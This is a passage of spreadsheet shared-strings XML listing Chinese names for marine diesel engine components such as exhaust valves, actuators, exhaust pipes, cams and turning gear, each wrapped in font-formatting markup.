        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀夹紧管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀壳体下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气弹簧</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气弹簧管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气供应</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀冷却水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀气动图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀凸轮程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀外壳的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀维修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀性能要求</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀研磨环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀研磨机质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压执行器测试的生产建议书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压执行器的生产建议书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀用</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>7972-2200</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀运行开启</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>执行器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀执行器，工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀执行器滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀执行器液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管，动力透平</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管，截面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2A-B5</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B4</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B3</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B2</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5B</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>A4</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B1</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6B</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>A3</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-TCS</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>TCS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管补偿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管过渡管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管和集气装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横截面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管加强环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管绝热</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管口盖的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管口盖组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管配对法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管外壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气和燃油凸轮的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气扩散器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气旁通管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气凸轮滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气凸轮毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气凸轮模板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气凸轮维修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气温度测量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气温度传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气温度的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ISO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气温度监视</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气系统，说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气系统消音器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气消声器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气液压驱动装置质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排污系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>TCS</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管，旁通</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管，气缸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1+8</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管吊梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管后端起吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管前端起吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管液压支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机和飞轮，工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机明细</t>
    </r>
